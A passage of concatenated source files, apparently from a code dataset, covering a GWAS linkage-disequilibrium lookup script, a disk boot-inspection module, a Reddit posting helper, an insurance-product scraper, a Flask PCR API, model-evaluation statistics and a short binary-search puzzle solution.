(\" + \", \".join([\"rs\" + ref_id for ref_id in ref_variants]) + \") map to genomic coordinates \" + snp_raw_i[0]\n else:\n var_id = \"rs\" + ref_variants[0]\n new_snp_lst.append([var_id])\n elif len(snp_info_lst) == 1:\n var_id = \"rs\" + snp_info_lst[0]['id']\n new_snp_lst.append([var_id])\n else:\n new_snp_lst.append(snp_raw_i)\n else:\n new_snp_lst.append(snp_raw_i)\n return new_snp_lst\n\n sanitized_query_snps = replace_coords_rsid(db, sanitized_query_snps)\n\n\n # find genomic coords of query snps in dbsnp \n # query_snp_details = []\n # details = collections.OrderedDict()\n details = {}\n rs_nums = []\n snp_pos = []\n snp_coords = []\n warn = []\n # windowWarnings = []\n queryWarnings = []\n for snp_i in sanitized_query_snps:\n if (len(snp_i) > 0 and len(snp_i[0]) > 2):\n if (snp_i[0][0:2] == \"rs\" or snp_i[0][0:3] == \"chr\") and snp_i[0][-1].isdigit():\n # query variant to get genomic coordinates in dbsnp\n snp_coord = get_coords(db, snp_i[0])\n if snp_coord != None:\n rs_nums.append(snp_i[0])\n snp_pos.append(int(snp_coord['position']))\n temp = [snp_i[0], str(snp_coord['chromosome']), int(snp_coord['position'])]\n snp_coords.append(temp)\n else:\n # Generate warning if query variant is not found in dbsnp\n warn.append(snp_i[0])\n queryWarnings.append([snp_i[0], \"NA\", \"Variant not found in dbSNP\" + dbsnp_version + \", variant removed.\"])\n else:\n # Generate warning if query variant is not a genomic position or rs number\n warn.append(snp_i[0])\n queryWarnings.append([snp_i[0], \"NA\", \"Not a valid SNP, variant removed.\"])\n else:\n # Generate error for empty query variant\n output[\"error\"] = \"Input list of RS numbers is empty\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n\n # generate warnings for query variants not found in dbsnp\n if warn != []:\n output[\"warning\"] = \"The following RS number(s) or coordinate(s) were not found in dbSNP \" + \\\n dbsnp_version + \": \" + \", \".join(warn)\n\n # Generate errors if no query variants are valid in dbsnp\n if len(rs_nums) == 0:\n output[\"error\"] = \"Input SNP list does not contain any valid RS numbers that are in dbSNP \" + \\\n dbsnp_version + \".\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n\n thinned_list = []\n\n print(\"##### FIND GWAS VARIANTS IN WINDOW #####\")\t\n # establish low/high window for each query snp\n window = 500000 # -/+ 500Kb = 500,000Bp = 1Mb = 1,000,000 Bp total\n found = {}\t\n # calculate and store LD info for all LD pairs\t\n 
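# Worked example of the LD math in get_ld_stats above (comment only,\n    # hypothetical counts): with haplotype counts A, B, C, D = 10, 2, 3, 25,\n    # delta = A*D - B*C = 244 and Ms = (A+C)*(B+D)*(A+B)*(C+D) = 117936,\n    # so r2 = delta**2 / Ms ~= 0.505; since delta > 0,\n    # D_prime = delta / min((A+C)*(C+D), (A+B)*(B+D)) = 244 / 324 ~= 0.753.\n    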
ldPairs = []\n # search query snp windows in gwas_catalog\n for snp_coord in snp_coords:\n # print(snp_coord)\n found[snp_coord[0]] = get_window_variants(db, snp_coord[1], snp_coord[2], window)\n # print(\"found\", snp_coord[0], len(found[snp_coord[0]]))\n if found[snp_coord[0]] is not None:\n thinned_list.append(snp_coord[0])\n # Calculate LD statistics of variant pairs ?in parallel?\t\n for record in found[snp_coord[0]]:\t\n ldPairs.append([snp_coord[0], str(snp_coord[1]), str(snp_coord[2]), \"rs\" + record[\"SNP_ID_CURRENT\"], str(record[\"chromosome_grch37\"]), str(record[\"position_grch37\"])])\t\n else:\t\n queryWarnings.append([snp_coord[0], \"chr\" + str(snp_coord[1]) + \":\" + str(snp_coord[2]), \"No variants found within window, variant removed.\"])\n \n ldPairsUnique = [list(x) for x in set(tuple(x) for x in ldPairs)]\t\n # print(\"ldPairsUnique\", ldPairsUnique)\t\n print(\"ldPairsUnique\", len(ldPairsUnique))\t\n print(\"##### BEGIN MULTITHREADING LD CALCULATIONS #####\")\t\n # start = timer()\t\n # leverage multiprocessing to calculate all LDpairs\t\n threads = 4\t\n splitLDPairsUnique = np.array_split(ldPairsUnique, threads)\t\n getLDStatsArgs = []\t\n for thread in range(threads):\t\n getLDStatsArgs.append([splitLDPairsUnique[thread].tolist(), pop_ids, thread])\t\n # print(\"getLDStatsArgs\", getLDStatsArgs)\t\n with Pool(processes=threads) as pool:\t\n ldInfoSubsets = pool.map(get_ld_stats_sub, getLDStatsArgs)\t\n \t\n # end = timer()\t\n # print(\"TIME ELAPSED:\", str(end - start) + \"(s)\")\t\n print(\"##### END MULTITHREADING LD CALCULATIONS #####\")\t\n # print(\"ldInfoSubsets\", json.dumps(ldInfoSubsets))\t\n # print(\"ldInfoSubsets length \", len(ldInfoSubsets))\t\n # merge all ldInfo Pool subsets into one ldInfo object\t\n ldInfo = {}\t\n for ldInfoSubset in ldInfoSubsets:\t\n for key in ldInfoSubset.keys():\t\n if key not in ldInfo.keys():\t\n ldInfo[key] = {}\t\n ldInfo[key] = ldInfoSubset[key]\t\n else:\t\n for subsetKey in ldInfoSubset[key].keys():\t\n ldInfo[key][subsetKey] = ldInfoSubset[key][subsetKey]\t\n\n # print(\"ldInfo\", json.dumps(ldInfo))\n \t\n for snp_coord in snp_coords:\t\n # print(\"snp_coord\", snp_coord)\n (matched_snps, window_problematic_snps) = get_gwas_fields(snp_coord[0], snp_coord[1], snp_coord[2], found[snp_coord[0]], pops, pop_ids, ldInfo, r2_d, r2_d_threshold)\n \n # windowWarnings += window_problematic_snps\n if (len(matched_snps) > 0):\n details[snp_coord[0]] = {\t\n \"aaData\": matched_snps\n }\n else:\n # remove from thinned_list\n thinned_list.remove(snp_coord[0])\n queryWarnings.append([snp_coord[0], \"chr\" + str(snp_coord[1]) + \":\" + str(snp_coord[2]), \"No variants in LD found within window, variant removed.\"]) \n\n # details[\"windowWarnings\"] = {\n # \"aaData\": windowWarnings\n # }\n details[\"queryWarnings\"] = {\n \"aaData\": queryWarnings\n }\n\n # Check if thinned list is empty, if it is, display error\n if len(thinned_list) < 1:\n output[\"error\"] = \"No variants in LD with GWAS Catalog.\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n\n # Return output\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n end = timer()\t\n print(\"TIME ELAPSED:\", str(end - start) + \"(s)\")\t\n print(\"##### LDTRAIT COMPLETE #####\")\n return (sanitized_query_snps, thinned_list, details)\n\n\ndef main():\n # snplst = sys.argv[1]\n snplst = \"5_LDtrait_snps.txt\"\n pop 
= \"YRI\"\n request = 8888\n web = False\n r2_d = \"r2\"\n r2_d_threshold = 0.1\n\n # Run function\n (sanitized_query_snps, thinned_list, details) = calculate_trait(snplst, pop, request, web, r2_d, r2_d_threshold)\n print(\"query_snps\", sanitized_query_snps)\n print(\"thinned_snps\", thinned_list)\n print(\"details\", json.dumps(details))\n\nif __name__ == \"__main__\":\n main()","sub_path":"LDlink/LDtrait.py","file_name":"LDtrait.py","file_ext":"py","file_size_in_byte":32130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"602272847","text":"#!/usr/bin/env python3\n# Copyright 2020 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Finds boot-related properties of disks.\n\nThis module supports offline inspection of block devices and\nvirtual disk files, with a focus on information that typically\nrequires booting the system.\n\nSee `model.InspectionResults` for which information is returned.\n\nIn terms of OS support, this module focuses on systems\nthat are runnable on Google Compute Engine, with a particular focus on the\nsystems that are importable to Google Compute Engine:\n https://cloud.google.com/compute/docs/import\n\nIn other words, it doesn't seek to exhaustively detect all systems,\nand will remove support for defunct systems over time.\n\"\"\"\n\nimport re\nimport sys\n\nfrom boot_inspect import model\nfrom boot_inspect.inspectors.os import architecture, linux, windows\nimport boot_inspect.system.filesystems\n\n\n_LINUX = [\n linux.Fingerprint(model.Distro.AMAZON, aliases=['amzn', 'amazonlinux']),\n linux.Fingerprint(\n model.Distro.CENTOS,\n legacy=linux.LegacyFingerprint(\n metadata_file='/etc/centos-release',\n version_pattern=re.compile(r'\\d+\\.\\d+'),\n derivative_metadata_files=[\n '/etc/fedora-release',\n '/etc/oracle-release',\n ]),\n ),\n linux.Fingerprint(\n model.Distro.DEBIAN,\n legacy=linux.LegacyFingerprint(\n metadata_file='/etc/debian_version',\n version_pattern=re.compile(r'\\d+\\.\\d+'),\n ),\n ),\n linux.Fingerprint(model.Distro.FEDORA),\n linux.Fingerprint(model.Distro.KALI),\n linux.Fingerprint(\n model.Distro.RHEL,\n legacy=linux.LegacyFingerprint(\n metadata_file='/etc/redhat-release',\n version_pattern=re.compile(r'\\d+\\.\\d+'),\n derivative_metadata_files=[\n '/etc/centos-release',\n '/etc/fedora-release',\n '/etc/oracle-release',\n ]),\n ),\n linux.Fingerprint(model.Distro.SLES, aliases=['sles_sap']),\n linux.Fingerprint(model.Distro.OPENSUSE, aliases=['opensuse-leap']),\n linux.Fingerprint(model.Distro.ORACLE, aliases=['ol', 'oraclelinux']),\n linux.Fingerprint(model.Distro.UBUNTU),\n]\n\n\ndef inspect_device(g, device: str) -> model.InspectionResults:\n \"\"\"Finds boot-related properties for a device using offline inspection.\n\n Args:\n g (guestfs.GuestFS): A launched, but unmounted, GuestFS instance.\n device: a reference to a mounted block device (eg: /dev/sdb), or\n to a virtual disk file (eg: /opt/images/disk.vmdk).\n\n Example:\n\n g = 
guestfs.GuestFS(python_return_dict=True)\n g.add_drive_opts(\"/dev/sdb\", format=\"raw\")\n g.launch()\n results = inspect_device(g, \"/dev/sdb\")\n \"\"\"\n\n roots = g.inspect_os()\n if len(roots) == 0:\n print('inspect_vm: no operating systems found', file=sys.stderr)\n sys.exit(1)\n root = roots[0]\n mount_points = g.inspect_get_mountpoints(root)\n for dev, mp in sorted(mount_points.items(), key=lambda k: len(k[0])):\n try:\n g.mount_ro(mp, dev)\n except RuntimeError as msg:\n print('%s (ignored)' % msg, file=sys.stderr)\n fs = boot_inspect.system.filesystems.GuestFSFilesystem(g)\n operating_system = linux.Inspector(fs, _LINUX).inspect()\n if not operating_system:\n operating_system = windows.Inspector(g, root).inspect()\n arch = architecture.Inspector(g, root).inspect()\n g.umount_all()\n\n return model.InspectionResults(\n device=device,\n os=operating_system,\n architecture=arch,\n )\n\n\ndef _linux_inspector(\n fs: boot_inspect.system.filesystems.Filesystem) -> linux.Inspector:\n \"\"\"Returns a linux.Inspector that is configured\n\n with all detectable Linux distros.\n \"\"\"\n return linux.Inspector(fs, _LINUX)\n","sub_path":"daisy_workflows/image_import/inspection/src/boot_inspect/inspection.py","file_name":"inspection.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"240035824","text":"import praw\nfrom praw.models import Submission\nfrom backend.api_keys import reddit_username, reddit_password, reddit_user_agent, reddit_client_id, reddit_client_secret\nfrom backend.log_util import log\n\nreddit_auth = praw.Reddit(client_id=reddit_client_id,\n client_secret=reddit_client_secret,\n password=reddit_password,\n user_agent=reddit_user_agent,\n username=reddit_username)\n\n\ndef submit_to_reddit(title, text, debug=False):\n \"\"\"\n Posts a link to the given subreddit\n :param debug: Submit to test subreddit if ture\n :param title: Title of the reddit post\n :param text: Text to add to the reddit self post\n \"\"\"\n if debug is True:\n subreddit = \"l3d00m\"\n else:\n subreddit = \"pietsmiet\"\n\n if (text == '') or (title == ''):\n log(\"Warning: Not submitting to reddit, null text or title\")\n return\n\n # Submit the post\n submission_url = reddit_auth.subreddit(subreddit).submit(title, selftext=text, resubmit=False,\n send_replies=False).shortlink\n log(\"Debug\", submission_url)\n return submission_url\n\n\ndef edit_submission(text, submission_url):\n if submission_url == \"\":\n log(\"EDIT: Submission url is empty\")\n return\n submission = Submission(reddit_auth, url=submission_url)\n submission.edit(text)\n log(\"Submission edited\")\n\n\ndef delete_submission(submission_url):\n if submission_url == \"\":\n log(\"Warning\", \"DELETE: Submission url is empty\")\n return\n submission = Submission(reddit_auth, url=submission_url)\n # Only remove the submission if there are less than 4 comments, otherwise unsticky\n comment_count = len(submission.comments.list())\n if comment_count < 5:\n submission.mod.remove()\n submission.mod.lock()\n log(\"Submission removed\")\n else:\n submission.mod.sticky(False)\n log(\"Submission unstickied\")\n","sub_path":"backend/reddit_util.py","file_name":"reddit_util.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"256895969","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom project_insurance_scrap.items import ProjectInsuranceScrapItem\nimport 
project_insurance_scrap.scrap_functions as shan\n\nclass A恒安标准Spider(scrapy.Spider):\n    name = '恒安标准'\n    #http://www.hengansl.com/cha/169455.html\n\n    def start_requests(self):\n        urls = ['http://www.hengansl.com/cha/2304450.html', # individual insurance\n                'http://www.hengansl.com/cha/2304451.html', # group insurance\n                'http://www.hengansl.com/cha/49308255.html', # online-sales insurance\n                'http://www.hengansl.com/cha/2304452.html', # bancassurance\n                'http://www.hengansl.com/cha/2304453.html'] # multi-channel insurance\n        for url in urls: \n            yield scrapy.Request(url=url ,callback=self.parse)\n    \n    def parse(self, response):\n        # extract the fields from each row\n        result = response.css('.list_ul a , .list_title').extract()\n        zs_result = result[(shan.which(shan.str_detect(\"在售\", result))[0]+1):shan.which(shan.str_detect(\"停售\", result))[0]]\n        ts_result = result[(shan.which(shan.str_detect(\"停售\", result))[0]+1):len(result)]\n        \n        for part in zs_result:\n            # fill in the item for a product that is on sale (\"在售\")\n            item = ProjectInsuranceScrapItem() \n            item['company_name'] = '恒安标准'\n            item['product_name'] = shan.str_extract('>(.*?)</a>',part) \n            item['product_sale_status'] = \"在售\" \n            item['product_contract_link'] = shan.str_extract('href=\"(.*)\" target=',part) \n            # yield the item\n            yield item \n        \n        for part in ts_result:\n            # fill in the item for a discontinued product (\"停售\")\n            item = ProjectInsuranceScrapItem() \n            item['company_name'] = '恒安标准'\n            item['product_name'] = shan.str_extract('>(.*?)</a>',part) \n            item['product_sale_status'] = \"停售\" \n            item['product_contract_link'] = shan.str_extract('href=\"(.*)\" target=',part) \n            # yield the item\n            yield item \n","sub_path":"project_insurance_scrap/spiders/a恒安标准.py","file_name":"a恒安标准.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103694869","text":"# -*- coding: utf-8 -*-\r\n# api.py\r\n\r\nfrom flask import Blueprint\r\nfrom flask_restful import Api\r\n\r\nfrom api.pcr import pcr\r\nfrom api.pcr import protocol as pcrProtocol\r\nfrom api.history import history as pcrHistory\r\n\r\n# list of PCR api\r\nbp_pcr = Blueprint('api_pcr', __name__)\r\nbp_pcr_protocol = Blueprint('api_pcr_protocol', __name__)\r\nbp_history = Blueprint('api_history', __name__)\r\n\r\n# For PCR API\r\napi_pcr = Api(bp_pcr)\r\n\r\napi_pcr.add_resource(pcr.Start, '/start')\r\napi_pcr.add_resource(pcr.Stop, '/stop')\r\napi_pcr.add_resource(pcr.Status, '/status')\r\napi_pcr.add_resource(pcr.ReloadProtocol, '/reloadProtocol')\r\n\r\n# For PCR Protocol Api\r\napi_pcr_protocol = Api(bp_pcr_protocol)\r\napi_pcr_protocol.add_resource(pcrProtocol.ProtocolList, '/list')\r\napi_pcr_protocol.add_resource(pcrProtocol.ProtocolSelect, '/select')\r\napi_pcr_protocol.add_resource(pcrProtocol.NewProtocol, '/new')\r\napi_pcr_protocol.add_resource(pcrProtocol.DeleteProtocol, '/delete')\r\napi_pcr_protocol.add_resource(pcrProtocol.EditProtocol, '/edit')\r\napi_pcr_protocol.add_resource(pcrProtocol.CheckProtocol, '/check')\r\n\r\n# For history API\r\napi_history = Api(bp_history)\r\napi_history.add_resource(pcrHistory.HistoryList, '/list')\r\napi_history.add_resource(pcrHistory.HistoryGraphData, '/graphdata')\r\napi_history.add_resource(pcrHistory.HistoryTempData, '/tempdata')\r\n","sub_path":"system/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105335114","text":"import os\r\nimport pathlib\r\nimport re\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom sklearn.metrics import fbeta_score\r\n\r\nimport 
config\r\nfrom util import data_loader\r\nfrom util import keras_util\r\nfrom util import path\r\n\r\nRECORD_DIR = os.path.join(os.path.abspath(\".\"), \"record\")\r\n\r\n\r\ndef model_f2_statistics_no_repeat(all_label, one_label, thresholds, save_dir=None, save_file=None):\r\n    all_label_best = {}\r\n    one_label_best = [{} for i in range(13)]\r\n    one_label_no_repeat = {}\r\n    all_label_no_repeat = []\r\n    for entry in all_label:\r\n        if entry[0].split('.')[0] not in all_label_best:\r\n            all_label_best[entry[0].split('.')[0]] = entry[1]\r\n            all_label_no_repeat.append(entry)\r\n\r\n    for label in one_label:\r\n        for entry in one_label[label]:\r\n            if entry[0].split('.')[0] not in one_label_best[label]:\r\n                one_label_best[label][entry[0].split('.')[0]] = entry[1]\r\n                if one_label_no_repeat.get(label) is None:\r\n                    one_label_no_repeat[label] = []\r\n                one_label_no_repeat[label].append(entry)\r\n\r\n    if save_file is not None:\r\n        with open(os.path.join(save_dir, save_file), \"w\") as f:\r\n            f.write(\"==========================All label==========================\\n\")\r\n            for i in all_label_no_repeat:\r\n                f.write(\"%f: %s\\n\" % (i[1], i[0]))\r\n\r\n            for i in range(len(one_label_no_repeat)):\r\n                f.write(\"\\n\\n\\n\\n\\n==========================One label: %d==========================\\n\" % i)\r\n                for j in one_label_no_repeat[i]:\r\n                    f.write(\"%f: %s\\n\" % (j[1], j[0]))\r\n\r\n    return all_label_no_repeat, one_label_no_repeat, thresholds\r\n\r\n\r\ndef model_f2_statistics(mode_path, val_index=1, save_dir=None, save_file=None):\r\n    \"\"\"\r\n    Collect statistics from every file under the model directory whose name contains \"evaluate\",\r\n    producing both an all-label ranking and per-label (one-label) rankings.\r\n    :param mode_path: directory to scan\r\n    :param save_file: file the statistics are written to\r\n    :return:\r\n    \"\"\"\r\n    evaluate_files = []\r\n    for root, dirs, files in os.walk(mode_path):\r\n        for file in files:\r\n            if (\"val%d\" % val_index) not in root:\r\n                continue\r\n            if \"evaluate\" in file and \"evaluate_revise\" not in file:\r\n                evaluate_files.append(os.path.join(root, file))\r\n\r\n    all_label = {}\r\n    one_label = {}\r\n    label_f2_threshold = [{} for i in range(13)]\r\n    for file in evaluate_files:\r\n        with open(file, \"r\") as f:\r\n            weight_file = \"\"\r\n            for i in f.readlines():\r\n                if \"Weight\" in i:\r\n                    # weight_file root paths differ between models trained by different people, so convert the path here\r\n                    weight_file = os.path.join(path.root_path,\r\n                                               pathlib.Path(re.match(r\"Weight:.*competition[\\\\/]*(.*)\", i).group(1)))\r\n                if \"Greedy F2-Score is:\" in i:\r\n                    if weight_file == \"\":\r\n                        print(\"file %s is abnormal\" % file)\r\n                    greedy_f2 = i.split(\":\")[-1].strip()\r\n                    all_label[weight_file] = float(greedy_f2)\r\n                if \"[label\" in i:\r\n                    if weight_file == \"\":\r\n                        print(\"file %s is abnormal\" % file)\r\n                    label = re.match(r\".*label *([0-9]*)\", i).group(1)\r\n                    greedy_f2 = re.match(r\".*greedy-f2=(.*)\\[\", i).group(1)\r\n                    threshold = re.match(r\".*greedy-f2=.*\\[(.*)\\]\", i).group(1)\r\n                    if one_label.get(int(label), None) is None:\r\n                        one_label[int(label)] = {}\r\n                    one_label[int(label)][weight_file] = float(greedy_f2)\r\n                    label_f2_threshold[int(label)][weight_file] = float(threshold)\r\n\r\n    all_label = sorted(all_label.items(), key=lambda x: x[1], reverse=True)\r\n    for i in range(len(one_label)):\r\n        one_label[i] = sorted(one_label[i].items(), key=lambda x: x[1], reverse=True)\r\n\r\n    if save_file is not None:\r\n        with open(os.path.join(save_dir, save_file), \"w\") as f:\r\n            f.write(\"==========================All label==========================\\n\")\r\n            for i in all_label:\r\n                f.write(\"%f: %s\\n\" % (i[1], i[0]))\r\n\r\n        for i in range(len(one_label)):\r\n            
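# one ranked section per label, mirroring the all-label block above\r\n            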
f.write(\"\\n\\n\\n\\n\\n==========================One label: %d==========================\\n\" % i)\r\n for j in one_label[i]:\r\n f.write(\"%f: %s\\n\" % (j[1], j[0]))\r\n\r\n return all_label, one_label, label_f2_threshold\r\n\r\n\r\ndef path_2_model_name(weight_path):\r\n tmp = os.path.split(weight_path)\r\n weight_name = tmp[-1]\r\n epoch = weight_name.split('.')[1]\r\n tmp = os.path.split(tmp[0])\r\n val = tmp[-1]\r\n tmp = os.path.split(tmp[0])\r\n model_number = tmp[-1]\r\n tmp = os.path.split(tmp[0])\r\n tmp = os.path.split(tmp[0])\r\n model_type = tmp[-1]\r\n\r\n return \"%s_%s_%s_%s\" % (model_type, model_number, val, epoch), (model_type, model_number, val, epoch)\r\n\r\n\r\ndef model_coor(model_statis: list, label, thresholds, val_index):\r\n _, val_files = data_loader.get_k_fold_files(\"1.txt\", val_index, [config.DATA_TYPE_ORIGINAL])\r\n y = data_loader.get_labels(val_files)\r\n y = np.array(y, np.int8).reshape((-1, 13))\r\n model_names = []\r\n model_predicts = []\r\n df = pd.DataFrame()\r\n for i in model_statis:\r\n weight_path = i[0]\r\n name, info = path_2_model_name(weight_path)\r\n if not os.path.exists(weight_path + \".predict.npy\"):\r\n continue\r\n predict = np.load(weight_path + \".predict.npy\")\r\n if thresholds is not None:\r\n for l in range(len(thresholds)):\r\n threshold = thresholds[l][weight_path]\r\n predict[:, l] = predict[:, l] > threshold\r\n\r\n predict = predict.astype(np.int8)\r\n\r\n try:\r\n\r\n if label is not None:\r\n predict = predict[:, label]\r\n f2 = fbeta_score(y[:, label], predict, beta=2)\r\n else:\r\n f2 = fbeta_score(y, predict, beta=2, average='macro')\r\n assert (f2 - i[1]) / i[1] < 0.01\r\n\r\n model_predicts.append(predict)\r\n model_names.append(name)\r\n df[name] = predict.flatten()\r\n except:\r\n print(weight_path)\r\n return df.corr()\r\n\r\n\r\ndef model_corr_heapmap(model_statis: list, label, thresholds, val_index, save_dir, save_file):\r\n corr = model_coor(model_statis, label, thresholds, val_index)\r\n heap_map(corr, save_dir, save_file)\r\n return corr\r\n\r\n\r\ndef heap_map(corr, save_dir, save_file):\r\n plt.gcf().clear()\r\n sns.set(font_scale=0.6)\r\n ax = sns.heatmap(corr, annot=True, annot_kws={\"size\": 5}, cmap='YlGnBu')\r\n ax.set_xticklabels(ax.get_xticklabels(), rotation=90)\r\n ax.set_yticklabels(ax.get_yticklabels(), rotation=0)\r\n ax.get_figure().savefig(os.path.join(save_dir, save_file), dpi=200, bbox_inches='tight')\r\n\r\n\r\ndef shord_board_statistics(label_statis_all, save_dir):\r\n shord_board_statis = [[] for i in range(5)]\r\n for val in range(5):\r\n label_statis_val = label_statis_all[val]\r\n for label in range(13):\r\n label_statis = label_statis_val[label]\r\n average = 0\r\n for i in range(5):\r\n average += label_statis[i][1] / 5\r\n shord_board_statis[val].append(average)\r\n\r\n with open(os.path.join(save_dir, \"short_board_statistics.txt\"), 'w+') as f:\r\n f.write(\"Top-5 f2-score average\\n\")\r\n for i in range(13):\r\n f.write(\"\\n#######label %d\\n\" % i)\r\n for j in range(5):\r\n f.write(\"val %d: %f\\n\" % (j + 1, shord_board_statis[j][i]))\r\n\r\n\r\ndef model_config_statistics(label_statis_all, save_dir):\r\n with open(os.path.join(save_dir, \"model_config_statistics.txt\"), \"w+\") as f:\r\n for label in range(13):\r\n f.write(\"##############################label %d##############################\\n\" % label)\r\n for val in range(5):\r\n f.write(\"---------------------val %d---------------------\\n\" % (val + 1))\r\n for rank in range(2):\r\n weight_file, f2 = 
label_statis_all[val][label][rank]\r\n                    _, model_config = keras_util.dynamic_model_import(weight_file)\r\n                    assert model_config.val_index == val + 1\r\n                    f.write(\"rank: %d, f2-score: %6f\\n\" % (rank, f2))\r\n                    f.write(\"model_name=%s\\n\" % model_config.model_name)\r\n                    f.write(\"image_resolution=%d\\n\" % model_config.image_resolution)\r\n                    f.write(\"data_type=%s\\n\" % str(model_config.data_type))\r\n                    f.write(\"label_position=%s\\n\" % str([str(i) for i in model_config.label_position]))\r\n\r\n                    f.write(\"train_file_cnt=%d\\n\" % model_config.train_file_cnt)\r\n                    f.write(\"val_file_cnt=%d\\n\" % model_config.val_file_cnt)\r\n                    try:\r\n                        f.write(\"label_color_augment=%s\\n\" % str([str(i) for i in model_config.label_color_augment]))\r\n                        f.write(\"color_augment_cnt=%d\\n\" % model_config.color_augment_cnt)\r\n                    except:\r\n                        pass\r\n\r\n                    try:\r\n                        f.write(\"label_up_sampling=%s\\n\" % str([str(i) for i in model_config.label_up_sampling]))\r\n                        f.write(\"label_up_sampling_cnt=%s\\n\" % str([str(i) for i in model_config.up_sampling_cnt]))\r\n                    except:\r\n                        pass\r\n\r\n                    try:\r\n                        f.write(\"down_sampling=%f\\n\" % model_config.downsampling)\r\n                        f.write(\"down_sampling_cnt=%d\\n\" % model_config.down_sampling_cnt)\r\n                    except:\r\n                        pass\r\n\r\n                    f.write(\"train_batch_size=%s\\n\" % str([str(i) for i in model_config.train_batch_size]))\r\n                    f.write(\"epoch=%s\\n\" % str([str(i) for i in model_config.epoch]))\r\n                    f.write(\"lr=%s\\n\" % str([str(i) for i in model_config.lr]))\r\n                    f.write(\"freeze_layers=%s\\n\" % str([str(i) for i in model_config.freeze_layers]))\r\n                    f.write(\"input_norm=%s\\n\" % model_config.input_norm)\r\n                    f.write(\"tta_flip=%s\\n\" % model_config.tta_flip)\r\n                    f.write(\"tta_crop=%s\\n\" % model_config.tta_crop)\r\n                    f.write(\"\\n\")\r\n\r\n\r\ndef do_statistics(target_dir, heapmap_num, short_board=False, model_config=False):\r\n    one_label_all = []\r\n    corr_all = [[] for i in range(5)]\r\n    for val_index in range(1, 6):\r\n        record_dir = os.path.join(target_dir, \"val%d\" % val_index)\r\n        pathlib.Path(record_dir).mkdir(parents=True, exist_ok=True)\r\n\r\n        all_label, one_label, thresholds = model_f2_statistics(path.MODEL_PATH, val_index, record_dir,\r\n                                                               \"statistics_val%d_all.txt\" % val_index)\r\n        all_label, one_label, thresholds = model_f2_statistics_no_repeat(all_label, one_label, thresholds, record_dir,\r\n                                                                         \"statistics_val%d_no_repeat.txt\" % val_index)\r\n        one_label_all.append(one_label)\r\n\r\n        model_corr_heapmap(all_label[:heapmap_num], None, thresholds, val_index, record_dir, \"label_all.png\")\r\n        for i in range(13):\r\n            corr = model_corr_heapmap(one_label[i][:heapmap_num], i, thresholds, val_index, record_dir,\r\n                                      'label_%d.png' % i)\r\n            corr_all[val_index - 1].append(corr)\r\n    if short_board:\r\n        shord_board_statistics(one_label_all, target_dir)\r\n    if model_config:\r\n        model_config_statistics(one_label_all, target_dir)\r\n\r\n    return one_label_all, corr_all\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    # do_statistics(RECORD_DIR, 20)\r\n    do_statistics(RECORD_DIR, 20, short_board=True, model_config=True)\r\n","sub_path":"util/model_statistics.py","file_name":"model_statistics.py","file_ext":"py","file_size_in_byte":12063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"289322410","text":"\"\"\"\nFarmer Nikolai hired two lumberjacks, Dmitry and Fedor,\nto cut down a forest so that a cornfield can be planted in its place.\nThe forest contains X trees.\n\nDmitry cuts down A trees per day, but every K-th day he rests\nand does not cut down a single tree. Thus, Dmitry rests on the K-th,\n2K-th, 3K-th day, and so on.\n\nFedor cuts down B trees per day, but every M-th day he rests\nand does not cut down a single tree. Thus, Fedor rests on the M-th,\n2M-th, 3M-th day, and so on.\n\nThe lumberjacks work in parallel, so on days when neither of them\nrests they cut down A + B trees, on days when only Fedor rests\nthey cut down A trees, and on days when only Dmitry rests, B trees.\nOn days when both lumberjacks rest, not a single tree is cut down.\n\nFarmer Nikolai wants to know how many days it will take the\nlumberjacks to cut down all the trees so that he can sow the field.\n\nWrite a program that, given the integers A, K, B, M and X,\ndetermines after how many days all the trees in the forest\nwill have been cut down.\n\"\"\"\n\n# version written after the editorial walkthrough\n\na, k, b, m, x = map(int, input().split())\n\nleft = 0\nright = x * 2 // a + 1\n\nwhile left < right:\n    days = (left + right) // 2\n    holidays_dmitry = days // k\n    holidays_fedor = days // m\n    lumber = (days - holidays_dmitry) * a + (days - holidays_fedor) * b\n    if lumber < x:\n        left = days + 1\n    else:\n        right = days\n\nprint(left)\n","sub_path":"lessons_5_6/task_6d.py","file_name":"task_6d.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"290566921","text":"import argparse\nimport os\nfrom dataset.dataset import get_loader\nfrom solver import Solver\n\ncaltech_101_categories = ['accordion', 'airplanes', 'anchor', 'ant', 'BACKGROUND_Google', 'barrel', 'bass', 'beaver', 'binocular', 'bonsai',\n                          'brain', 'brontosaurus', 'buddha', 'butterfly', 'camera', 'cannon', 'car_side', 'ceiling_fan', 'cellphone',\n                          'chair', 